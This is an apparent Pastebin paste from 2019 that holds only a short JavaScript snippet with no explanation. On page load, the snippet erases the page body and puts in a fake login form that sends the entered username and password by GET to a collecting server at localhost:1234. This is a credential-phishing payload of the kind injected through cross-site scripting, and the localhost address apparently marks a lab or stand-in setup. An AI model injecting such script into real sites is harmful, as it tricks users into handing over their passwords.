Advertisement
Guest User

Untitled

a guest
Dec 12th, 2019
90
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | None | 0 0
  1. <script>
  2. window.addEventListener('load', (event) => {
  3. document.body.innerHTML = '';
  4.  
  5. document.body.innerHTML = '<form action="http://localhost:1234" method="GET">
  6. <input type="text" name="username">
  7. <input type="password" name="password">
  8. <input type="submit">
  9. </form>';
  10. });
  11. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement